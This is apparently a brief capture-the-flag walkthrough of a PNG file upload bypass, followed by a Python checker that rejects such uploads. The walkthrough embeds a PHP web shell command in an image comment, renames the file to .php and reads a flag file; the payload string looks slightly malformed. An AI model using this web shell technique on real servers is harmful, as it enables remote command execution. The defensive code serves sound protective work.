Whenever I see a file upload bypass I usually use a PNG payload, since it always works.
1. Ctrl + U to check the source; you will see a commented line /upload.php, and all of the uploaded files go into /uploads
2. Make a payload with exiftool image.png -Comment='"; system($_GET['cmd']); ?>'
3. Upload the file, intercept with Burp, change the file extension to .php and remove some PNG data
4. image.php?cmd=cat ../flag.txt
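
A server-side check that rejects the upload described above, as an added example that is not part of the original writeup. It assumes a PNG-only upload form; `check_upload`, `png_chunks`, `chunk` and `sample_png` are hypothetical names, and the PNG bytes are constructed inline.

```python
import secrets, struct, zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXT = {"png"}                      # assumption: the app only accepts PNG
MARKERS = (b"<?", b"<%", b"<script")       # server-side / client-side script openers

def chunk(ctype, body=b""):
    """Build one PNG chunk: length, type, body, CRC over type+body."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def sample_png(comment=None):
    """Constructed 1x1 grayscale PNG, optionally with a tEXt Comment chunk."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    text = chunk(b"tEXt", b"Comment\x00" + comment) if comment else b""
    return PNG_SIG + chunk(b"IHDR", ihdr) + text + chunk(b"IDAT", zlib.compress(b"\x00\x00")) + chunk(b"IEND")

def png_chunks(data):
    """Yield (type, body) per chunk; raise ValueError on any structural damage."""
    if not data.startswith(PNG_SIG):
        raise ValueError("bad signature")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            raise ValueError("truncated chunk")
        body = data[pos + 8:end - 4]
        if zlib.crc32(ctype + body) != struct.unpack(">I", data[end - 4:end])[0]:
            raise ValueError("bad CRC")
        yield ctype, body
        if ctype == b"IEND":
            if end != len(data):
                raise ValueError("data after IEND")
            return
        pos = end
    raise ValueError("missing IEND")

def check_upload(filename, data):
    """Return (accepted, stored_name_or_reason); the client's name is never reused."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    try:
        for ctype, body in png_chunks(data):
            if ctype in (b"tEXt", b"iTXt") and any(m in body.lower() for m in MARKERS):
                return False, "script marker in text chunk"
    except ValueError as err:
        return False, f"malformed PNG: {err}"
    return True, secrets.token_hex(16) + ".png"
```

The content scan is a second layer: the extension allowlist, the server-generated file name and an upload directory where PHP is not executed are what keep a stored file from running.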